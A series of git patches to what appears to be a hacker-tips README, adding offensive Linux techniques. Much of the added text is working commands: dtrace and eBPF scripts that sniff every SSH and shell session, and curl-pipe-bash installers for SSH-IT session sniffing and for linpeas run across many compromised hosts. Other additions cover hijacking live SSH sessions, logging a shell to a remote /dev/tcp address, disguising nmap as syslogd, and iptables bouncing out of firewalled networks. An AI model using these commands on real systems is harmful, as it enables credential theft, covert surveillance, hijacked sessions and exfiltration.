92f8c55a3dfc86df3f3454d0cb7c8e09431df841 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Sat, 28 Oct 2023 13:49:16 +0100 Subject: [PATCH 43/56] Update README.md --- README.md | 14 ++++++-------- 1 file changed, 6 insertions(+), 8 deletions(-) diff --git a/README.md b/README.md index e2834b8..9132514 100644 --- a/README.md +++ b/README.md @@ -1571,24 +1571,22 @@ Create a 256MB large encrypted file system. You will be prompted for a password. ```sh dd if=/dev/urandom of=/tmp/crypted bs=1M count=256 iflag=fullblock cryptsetup luksFormat /tmp/crypted -mkfs.ext3 /tmp/crypted +cryptsetup open /tmp/crypted sec +mkfs -t ext3 /dev/mapper/sec ``` Mount: ```sh -losetup -f -losetup /dev/loop0 /tmp/crypted -cryptsetup open /dev/loop0 crypted -mount -t ext3 /dev/mapper/crypted /mnt/crypted +cryptsetup open /tmp/crypted sec +mount -o nofail,noatime /dev/mapper/sec /mnt/sec ``` Store data in `/mnt/crypted`, then unmount: ```sh -umount /mnt/crypted -cryptsetup close crypted -losetup -d /dev/loop0 +umount /mnt/sec +cryptsetup close sec ``` **8.ii.b. Linux transportable encrypted filesystems - EncFS** From 44637987cb9cb9b8f49ec1fca460c7e37a80bff0 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 31 Oct 2023 06:25:48 +0000 Subject: [PATCH 44/56] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 9132514..8f8b9bb 100644 --- a/README.md +++ b/README.md @@ -1899,6 +1899,7 @@ Telegram Channels Mindmaps & Knowledge 1. [Compass Sec Cheat Sheets](https://github.com/CompassSecurity/Hacking_Tools_Cheat_Sheet) +2. [Network Pentesting](https://github.com/wearecaster/NetworkNightmare/blob/main/NetworkNightmare_by_Caster.png) 1. [Active Directory](https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg) From 279feada4cca45bbdc21fc804407b1bd3c9d0a3c Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 1 Nov 2023 15:12:47 +0000 Subject: [PATCH 45/56] dtrace --- README.md | 29 +++++++++++++++++++++++++---- 1 file changed, 25 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index 8f8b9bb..d739dcc 100644 --- a/README.md +++ b/README.md @@ -85,6 +85,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [Encrypting a file](#encrypting-file) 1. [SSH session sniffing and hijaking](#ssh-sniffing) 1. [Sniff a user's SHELL session with script](#ssh-sniffing-script) + 2. [Sniff all SHELL sessions with dtrace](#dtrace) 1. [Sniff a user's outgoing SSH session with strace](#ssh-sniffing-strace) 1. [Sniff a user's outgoing SSH session with a wrapper script](#ssh-sniffing-wrapper) 1. [Sniff a user's outgoing SSH session with SSH-IT](#ssh-sniffing-sshit) @@ -1631,8 +1632,28 @@ echo 'exec script -qc /bin/bash ~/.ssh-log.txt' >>~/.profile ``` Consider using [zap-args](#bash-hide-arguments) to hide the the arguments and /dev/tcp/3.13.3.7/1524 as an output file to log to a remote host. + +**9.ii Sniff all SHELL sessions with dtrace** + +Especially useful for Solaris/SunOS and FreeBSD (pfSense). It uses kernel probes. + +Copy this "D Script" to the target system to a file named `d`: +```c +#pragma D option quiet +inline string NAME = "sshd"; +syscall::write:entry +/(arg0 >= 7) && (arg2 <= 16) && (execname == NAME)/ +{ printf("%d: %s\n", pid, stringof(copyin(arg1, arg2))); } +``` + +Start a dtrace and log to /tmp/.log: +```sh +### Start probe as background process (csh & bash) +(dtrace -sd >&/tmp/.log &) +``` + -**9.ii Sniff a user's outgoing SSH session with strace** +**9.iii Sniff a user's outgoing SSH session with strace** ```sh strace -e trace=read -p 2>&1 | while read x; do echo "$x" | grep '^read.*= [1-9]$' | cut -f2 -d\"; done ``` @@ -1640,7 +1661,7 @@ Dirty way to monitor a user who is using *ssh* to connect to another host from a -**9.iii. Sniff a user's outgoing SSH session with a wrapper script** +**9.iv. Sniff a user's outgoing SSH session with a wrapper script** Even dirtier method in case */proc/sys/kernel/yama/ptrace_scope* is set to 1 (strace will fail on already running SSH sessions) @@ -1686,7 +1707,7 @@ To uninstall cut & paste this\033[0m:\033[1;36m The SSH session will be sniffed and logged to *~/.ssh/logs/* the next time the user logs into his shell and uses SSH. -**9.iv Sniff a user's outgoing SSH session using SSH-IT** +**9.v Sniff a user's outgoing SSH session using SSH-IT** The easiest way is using [https://www.thc.org/ssh-it/](https://www.thc.org/ssh-it/). @@ -1695,7 +1716,7 @@ bash -c "$(curl -fsSL https://thc.org/ssh-it/x)" ``` -**9.v Hijak / Take-over a running SSH session** +**9.vi Hijak / Take-over a running SSH session** Use [https://github.com/nelhage/reptyr](https://github.com/nelhage/reptyr) to take over an existing SSH session: ```sh From b1787ebb76fcda1ded0a95d18f68a60816578939 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 1 Nov 2023 15:16:08 +0000 Subject: [PATCH 46/56] Update README.md --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index d739dcc..1425b37 100644 --- a/README.md +++ b/README.md @@ -1635,7 +1635,7 @@ Consider using [zap-args](#bash-hide-arguments) to hide the the arguments and /d **9.ii Sniff all SHELL sessions with dtrace** -Especially useful for Solaris/SunOS and FreeBSD (pfSense). It uses kernel probes. +Especially useful for Solaris/SunOS and FreeBSD (pfSense). It uses kernel probes to trace *all* sshd processes. Copy this "D Script" to the target system to a file named `d`: ```c @@ -1648,8 +1648,8 @@ syscall::write:entry Start a dtrace and log to /tmp/.log: ```sh -### Start probe as background process (csh & bash) -(dtrace -sd >&/tmp/.log &) +### Start kernel probe as background process. +(dtrace -sd >/tmp/.log &) ``` From 9977cde53e6bfd84a706a41f86af12cbc5a2fda1 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 7 Nov 2023 13:57:32 +0000 Subject: [PATCH 47/56] Update README.md --- README.md | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/README.md b/README.md index 1425b37..7130058 100644 --- a/README.md +++ b/README.md @@ -547,6 +547,7 @@ More: [https://github.com/twelvesec/port-forwarding](https://github.com/twelvese **3.iv. Use any tool via Socks Proxy** +### Create a tunnel from the target to your workstation using gsocket: On the target's network: ```sh ## Create a SOCKS proxy into the target's network. @@ -560,6 +561,7 @@ On your workstation: gs-netcat -p 1080 ``` +### Using ProxyChain: ```sh ## Use ProxyChain to access any host on the target's network: echo -e "[ProxyList]\nsocks5 127.0.0.1 1080" >pc.conf @@ -570,6 +572,15 @@ proxychains -f pc.conf -q nmap -n -Pn -sV -F --open 192.168.1.1 seq 1 254 | xargs -P10 -I{} proxychains -f pc.conf -q nmap -n -Pn -sV -F --open 192.168.1.{} ``` +### Using GrafTCP: +```sh +## Use graftcp to access any host on the target's network: +(graftcp-local -select_proxy_mode only_socks5 &) +graftcp curl ipinfo.io +graftcp ssh root@192.168.1.1 +graftcp nmap -n -Pn -sV -F --open 19.168.1.1 +``` + **3.v. Find your public IP address** From ad656127256c1595c32f9742e2959b463fc691ee Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 7 Nov 2023 14:40:26 +0000 Subject: [PATCH 48/56] Update README.md --- README.md | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) diff --git a/README.md b/README.md index 7130058..96d30b5 100644 --- a/README.md +++ b/README.md @@ -444,6 +444,7 @@ NET="10.11.0" # discover 10.11.0.1-10.11.0.254 seq 1 254 | xargs -P20 -I{} ping -n -c3 -i0.2 -w1 -W200 "${NET:-192.168.0}.{}" | grep 'bytes from' | awk '{print $4" "$7;}' | sort -uV -k1,1 ``` +--- **3.ii. tcpdump** @@ -458,6 +459,7 @@ tcpdump -nlq "tcp[13] == 2 and dst port 22" | while read x; do echo "${x}"; echo tcpdump -s0 -nAq 'tcp and (ip[2:2] > 60)' ``` +--- **3.iii. Tunnel and forwarding** @@ -474,6 +476,7 @@ openssl s_client -connect smtp.gmail.com:465 socat TCP-LISTEN:25,reuseaddr,fork openssl-connect:smtp.gmail.com:465 ``` +--- **3.iii.a Raw TCP reverse ports** @@ -493,6 +496,7 @@ See also [remote.moe](#revese-shell-remote-moe) (free) to forward raw TCP from t Other free services are limited to forward HTTPS only (not raw TCP). Some tricks below show how to tunnel raw TCP over HTTPS forwards (using websockets). +--- **3.iii.b HTTPS reverse tunnels** @@ -544,6 +548,7 @@ curl -x socks5h://0 ipinfo.io More: [https://github.com/twelvesec/port-forwarding](https://github.com/twelvesec/port-forwarding) and [Tunnel via Cloudflare to any TCP Service](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service) and [Awesome Tunneling](https://github.com/anderspitman/awesome-tunneling). +--- **3.iv. Use any tool via Socks Proxy** @@ -581,6 +586,7 @@ graftcp ssh root@192.168.1.1 graftcp nmap -n -Pn -sV -F --open 19.168.1.1 ``` +--- **3.v. Find your public IP address** @@ -617,6 +623,7 @@ curl -x socks5h://localhost:9050 -s https://check.torproject.org/api/ip ### Result should be {"IsTor":true... ``` +--- **3.vi. Check reachability from around the world** @@ -630,6 +637,7 @@ ooniprobe list ooniprobe list 1 ``` +--- **3.vii. Check/Scan Open Ports on an IP** @@ -646,6 +654,7 @@ nmap -sCV -F -Pn --min-rate 10000 scanme.nmap.org nmap -A -F -Pn --min-rate 10000 --script vulners.nse --script-timeout=5s scanme.nmap.org ``` +--- **3.viii. Crack Password hashes** @@ -863,6 +872,7 @@ xxd -p issue.net-COPY ``` +--- ### 4.ii. File transfer - using cut & paste @@ -873,6 +883,7 @@ cat >output.txt <<-'__EOF__' __EOF__ ### Finish your cut & paste by typing __EOF__ ``` +--- ### 4.iii. File transfer - using *screen* @@ -925,6 +936,7 @@ Get *screen* to slurp the base64 encoded data into screen's clipboard and paste Note: Two CTRL-d are required due to a [bug in openssl](https://github.com/openssl/openssl/issues/9355). +--- ### 4.iv. File transfer - using gs-netcat and sftp @@ -949,6 +961,7 @@ gs-netcat -l <"FILENAME" # Will output a SECRET used by the receiver gs-netcat >"FILENAME" # When prompted, enter the SECRET from the sender ``` +--- ### 4.v. File transfer - using HTTPs @@ -981,6 +994,7 @@ On the Sender: curl -X POST https://CF-URL-CHANGE-ME.trycloudflare.com/upload -F 'files=@myfile.txt' ``` +--- ### 4.vi. File transfer without curl @@ -997,6 +1011,7 @@ burl() { # PORT=31337 burl http://37.120.235.188/blah.tar.gz >blah.tar.gz ``` +--- ### 4.vii. File transfer using a public dump @@ -1019,6 +1034,7 @@ transfer ~/.ssh # An entire directory ``` A list of our [favorite public upload sites](#cloudexfil). +--- ### 4.viii. File transfer - using rsync @@ -1060,6 +1076,7 @@ rsync -ahPRv -e "bash -c 'openssl s_client -connect 1.2.3.4:31337 -servername th Rsync can be combined to exfil via [https / cloudflared raw TCP tunnels](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service). (To exfil from Windows, use the rsync.exe from the [gsocket windows package](https://github.com/hackerschoice/binary/raw/main/gsocket/bin/gs-netcat_x86_64-cygwin_full.zip)). A noisier solution is [syncthing](https://syncthing.net/). +--- ### 4.ix. File transfer - using WebDAV @@ -1097,6 +1114,7 @@ Or mount the WebDAV share on Windows (Z:/): net use * \\example-foo-bar-lights.trycloudflare.com@SSL\sources ``` +--- ### 4.x. File transfer to Telegram From 49fd2df9434fa78247e71d6e9ed751f37839d902 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 9 Nov 2023 11:56:58 +0000 Subject: [PATCH 49/56] Update README.md --- README.md | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) diff --git a/README.md b/README.md index 96d30b5..8780b40 100644 --- a/README.md +++ b/README.md @@ -31,6 +31,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [Tunnel and forwarding](#tunnel) 1. [Raw TCP reverse ports](#ports) 1. [HTTPS reverse forwards](#https) + 2. [Bouncing traffic with iptables](#iptables) 1. [Use any tool via Socks Proxy](#scan-proxy) 1. [Find your public IP address](#your-ip) 1. [Check reachability from around the world](#check-reachable) @@ -548,6 +549,33 @@ curl -x socks5h://0 ipinfo.io More: [https://github.com/twelvesec/port-forwarding](https://github.com/twelvesec/port-forwarding) and [Tunnel via Cloudflare to any TCP Service](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service) and [Awesome Tunneling](https://github.com/anderspitman/awesome-tunneling). +--- + +**3.iii.c Bouncing traffic with iptables*** + +Use the host 192.168.0.100 as a Jump-Host: Forward any connection from anywhere to 192.168.0.100:53 onwards to 1.2.3.4:443. +```sh +FPORT=53 +DSTIP=1.2.3.4 +DPORT=443 +echo 1 >/proc/sys/net/ipv4/ip_forward + +iptables -t mangle -I PREROUTING -p tcp --dport ${FPORT:?} -m addrtype --dst-type LOCAL -j MARK --set-mark 1188 +iptables -t mangle -I PREROUTING -j CONNMARK --restore-mark + +iptables -t nat -I PREROUTING -p tcp -m mark --mark 1188 -j DNAT --to ${DSTIP:?}:${DPORT:?} +iptables -I FORWARD -m mark --mark 1188 -j ACCEPT + +iptables -t nat -I POSTROUTING -m mark --mark 1188 -j MASQUERADE +iptables -t nat -I POSTROUTING -m mark --mark 1188 -j CONNMARK --save-mark + +iptables -t mangle -I INPUT -m mark --mark 1188 -j ACCEPT +iptables -t mangle -I INPUT -j CONNMARK --restore-mark +``` +> We use this trick to reach the gsocket-relay-network (or TOR) from deep inside firewalled networks. +> GS_HOST=192.168.0.100 GS_PORT=53 ./deploy.sh +> GS_HOST=1.2.3.4: GS_PORT=443 gs-netcat -i -s ... + --- **3.iv. Use any tool via Socks Proxy** From 9195ace1bfa12d9473016f855871de25482b2814 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 9 Nov 2023 12:00:26 +0000 Subject: [PATCH 50/56] ipt JumpHost --- README.md | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 8780b40..7b1932d 100644 --- a/README.md +++ b/README.md @@ -572,9 +572,16 @@ iptables -t nat -I POSTROUTING -m mark --mark 1188 -j CONNMARK --save-mark iptables -t mangle -I INPUT -m mark --mark 1188 -j ACCEPT iptables -t mangle -I INPUT -j CONNMARK --restore-mark ``` -> We use this trick to reach the gsocket-relay-network (or TOR) from deep inside firewalled networks. -> GS_HOST=192.168.0.100 GS_PORT=53 ./deploy.sh -> GS_HOST=1.2.3.4: GS_PORT=443 gs-netcat -i -s ... + +We use this trick to reach the gsocket-relay-network (or TOR) from deep inside firewalled networks. +```sh +# Deploy on a target that can only reach 192.168.0.100 +GS_HOST=192.168.0.100 GS_PORT=53 ./deploy.sh +``` +```sh +# Access the target +GS_HOST=1.2.3.4: GS_PORT=443 gs-netcat -i -s ... +``` --- From 1e41a78449022cb1a6bbda9500fff1dc98370d9a Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Fri, 10 Nov 2023 09:54:10 +0000 Subject: [PATCH 51/56] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 7b1932d..43d2666 100644 --- a/README.md +++ b/README.md @@ -152,7 +152,7 @@ screen -x MyName Alternatively if there is no Bash: ```sh -cp `which nmap` syslogd +cp "$(command -v nmap)" syslogd PATH=.:$PATH syslogd -T0 10.0.2.1/24 ``` In this example we execute *nmap* but let it appear with the name *syslogd* in *ps alxwww* process list. From 180b8650ce39ee607956952867fb1fb73ff02aa5 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Fri, 10 Nov 2023 10:10:44 +0000 Subject: [PATCH 52/56] Update README.md --- README.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index 43d2666..c636be4 100644 --- a/README.md +++ b/README.md @@ -84,13 +84,13 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [cryptsetup](#crypto-filesystem) 1. [EncFS](#encfs) 1. [Encrypting a file](#encrypting-file) -1. [SSH session sniffing and hijaking](#ssh-sniffing) +1. [SSH session sniffing and hijacking](#ssh-sniffing) 1. [Sniff a user's SHELL session with script](#ssh-sniffing-script) 2. [Sniff all SHELL sessions with dtrace](#dtrace) 1. [Sniff a user's outgoing SSH session with strace](#ssh-sniffing-strace) 1. [Sniff a user's outgoing SSH session with a wrapper script](#ssh-sniffing-wrapper) 1. [Sniff a user's outgoing SSH session with SSH-IT](#ssh-sniffing-sshit) - 1. [Hijak / Take-over a running SSH session](#hijak) + 1. [Hijack / Take-over a running SSH session](#hijack) 1. [VPN and Shells](#vpn-shell) 1. [Disposable Root Servers](#shell) 1. [VPN/VPS Providers](#vpn) @@ -1779,8 +1779,8 @@ The easiest way is using [https://www.thc.org/ssh-it/](https://www.thc.org/ssh-i bash -c "$(curl -fsSL https://thc.org/ssh-it/x)" ``` - -**9.vi Hijak / Take-over a running SSH session** + +**9.vi Hijack / Take-over a running SSH session** Use [https://github.com/nelhage/reptyr](https://github.com/nelhage/reptyr) to take over an existing SSH session: ```sh From 376095318ae0d56f5f1b08f1e8884e76b085c884 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 13 Nov 2023 19:48:45 +0000 Subject: [PATCH 53/56] Update README.md --- README.md | 22 ++++++++++++++++++---- 1 file changed, 18 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index c636be4..c530af2 100644 --- a/README.md +++ b/README.md @@ -87,6 +87,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [SSH session sniffing and hijacking](#ssh-sniffing) 1. [Sniff a user's SHELL session with script](#ssh-sniffing-script) 2. [Sniff all SHELL sessions with dtrace](#dtrace) + 2. [Sniff all SHELL sessions with eBPF](#bpf) 1. [Sniff a user's outgoing SSH session with strace](#ssh-sniffing-strace) 1. [Sniff a user's outgoing SSH session with a wrapper script](#ssh-sniffing-wrapper) 1. [Sniff a user's outgoing SSH session with SSH-IT](#ssh-sniffing-sshit) @@ -1716,8 +1717,21 @@ Start a dtrace and log to /tmp/.log: (dtrace -sd >/tmp/.log &) ``` + +**9.iii Sniff all SHELL sessions with eBPF** + +eBPF allows us to *safely* hook over 120,000 functions in the kernel. It's like a better "dtrace" but for Linux. + +```sh +curl -o bpftrace -fsSL https://github.com/iovisor/bpftrace/releases/latest/download/bpftrace +chmod 755 bpftrace +curl -o ptysnoop.bt -fsSL https://github.com/hackerschoice/bpfhacks/raw/main/ptysnoop.bt +./bpftrace -Bnone ptysnoop.bt +``` +Check out our very own [eBPF tools to sniff sudo/su/ssh passwords](https://github.com/hackerschoice/bpfhacks). + -**9.iii Sniff a user's outgoing SSH session with strace** +**9.iv Sniff a user's outgoing SSH session with strace** ```sh strace -e trace=read -p 2>&1 | while read x; do echo "$x" | grep '^read.*= [1-9]$' | cut -f2 -d\"; done ``` @@ -1725,7 +1739,7 @@ Dirty way to monitor a user who is using *ssh* to connect to another host from a -**9.iv. Sniff a user's outgoing SSH session with a wrapper script** +**9.v. Sniff a user's outgoing SSH session with a wrapper script** Even dirtier method in case */proc/sys/kernel/yama/ptrace_scope* is set to 1 (strace will fail on already running SSH sessions) @@ -1771,7 +1785,7 @@ To uninstall cut & paste this\033[0m:\033[1;36m The SSH session will be sniffed and logged to *~/.ssh/logs/* the next time the user logs into his shell and uses SSH. -**9.v Sniff a user's outgoing SSH session using SSH-IT** +**9.vi Sniff a user's outgoing SSH session using SSH-IT** The easiest way is using [https://www.thc.org/ssh-it/](https://www.thc.org/ssh-it/). @@ -1780,7 +1794,7 @@ bash -c "$(curl -fsSL https://thc.org/ssh-it/x)" ``` -**9.vi Hijack / Take-over a running SSH session** +**9.vii Hijack / Take-over a running SSH session** Use [https://github.com/nelhage/reptyr](https://github.com/nelhage/reptyr) to take over an existing SSH session: ```sh From 83a0f152f26420614b9d3531402250f54da41a3a Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Sat, 18 Nov 2023 23:30:35 +0000 Subject: [PATCH 54/56] Update README.md --- README.md | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) diff --git a/README.md b/README.md index c530af2..ad8c781 100644 --- a/README.md +++ b/README.md @@ -18,6 +18,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [Hide a process as root](#hide-a-process-root) 1. [Hide scripts](#hide-scripts) 1. [Hide from cat](#cat) + 1. [Execute in parrallel with separate logfiles](#parallel) 1. [SSH](#ssh) 1. [Almost invisible SSH](#ssh-invisible) 1. [SSH tunnel](#ssh-tunnel) @@ -285,6 +286,21 @@ echo "ssh-ed25519 AAAAOurPublicKeyHere....blah x@y"$'\r'"$(a ### it. The $'\r' is a bash special to create a \r (carriage return). ``` + +**1.ix. Execute in parallel with separate logfiles*** + +Scan 20 hosts in parallel and log each result to a separate log file: +```sh +# hosts.txt contains a long list of hostnames or ip-addresses +cat hosts.txt | parallel -j20 'nmap -n -Pn -sCV -F --open {} >nmap_{}.txt' +``` + +Execute [Linpeas](https://github.com/carlospolop/PEASS-ng) on all [gsocket](https://www.gsocket.io/deploy) hosts using 40 workers: +```sh +# secrets.txt contains a long list of gsocket-secrets for each remote server. +cat secrets.txt | parallel -j20 'mkdir host_{}; exec gsexec {} "curl -fsSL https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh" >host_{}/linpeas.log 2>host_{}/linpeas.err' +``` + --- ## 2. SSH From e68b798c70f045fcdede34c3216df2112d4e0b43 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Sat, 18 Nov 2023 23:36:38 +0000 Subject: [PATCH 55/56] Update README.md --- README.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index ad8c781..60eb56d 100644 --- a/README.md +++ b/README.md @@ -298,9 +298,11 @@ cat hosts.txt | parallel -j20 'nmap -n -Pn -sCV -F --open {} >nmap_{}.txt' Execute [Linpeas](https://github.com/carlospolop/PEASS-ng) on all [gsocket](https://www.gsocket.io/deploy) hosts using 40 workers: ```sh # secrets.txt contains a long list of gsocket-secrets for each remote server. -cat secrets.txt | parallel -j20 'mkdir host_{}; exec gsexec {} "curl -fsSL https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh" >host_{}/linpeas.log 2>host_{}/linpeas.err' +cat secrets.txt | parallel -j40 'mkdir host_{}; exec gsexec {} "curl -fsSL https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh" >host_{}/linpeas.log 2>host_{}/linpeas.err' ``` +Note: `xargs -P20 -I{}` is another good way but it cant log each output into separate file. + --- ## 2. SSH From 068af0e019526a7c6a938bd3f2cb1384697f3b52 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Sun, 19 Nov 2023 07:57:37 +0000 Subject: [PATCH 56/56] Update README.md --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 60eb56d..0171e34 100644 --- a/README.md +++ b/README.md @@ -292,16 +292,16 @@ echo "ssh-ed25519 AAAAOurPublicKeyHere....blah x@y"$'\r'"$(a Scan 20 hosts in parallel and log each result to a separate log file: ```sh # hosts.txt contains a long list of hostnames or ip-addresses -cat hosts.txt | parallel -j20 'nmap -n -Pn -sCV -F --open {} >nmap_{}.txt' +cat hosts.txt | parallel -j20 'exec nmap -n -Pn -sCV -F --open {} >nmap_{}.txt' ``` +Note: The example uses `exec` to replace the underlying shell with the last process (nmap, gsexec). It's optional but reduces the number of running shell binaries. Execute [Linpeas](https://github.com/carlospolop/PEASS-ng) on all [gsocket](https://www.gsocket.io/deploy) hosts using 40 workers: ```sh # secrets.txt contains a long list of gsocket-secrets for each remote server. cat secrets.txt | parallel -j40 'mkdir host_{}; exec gsexec {} "curl -fsSL https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh" >host_{}/linpeas.log 2>host_{}/linpeas.err' ``` - -Note: `xargs -P20 -I{}` is another good way but it cant log each output into separate file. +Note: `xargs -P20 -I{}` is another good way but it cannot log each output into a separate file. ---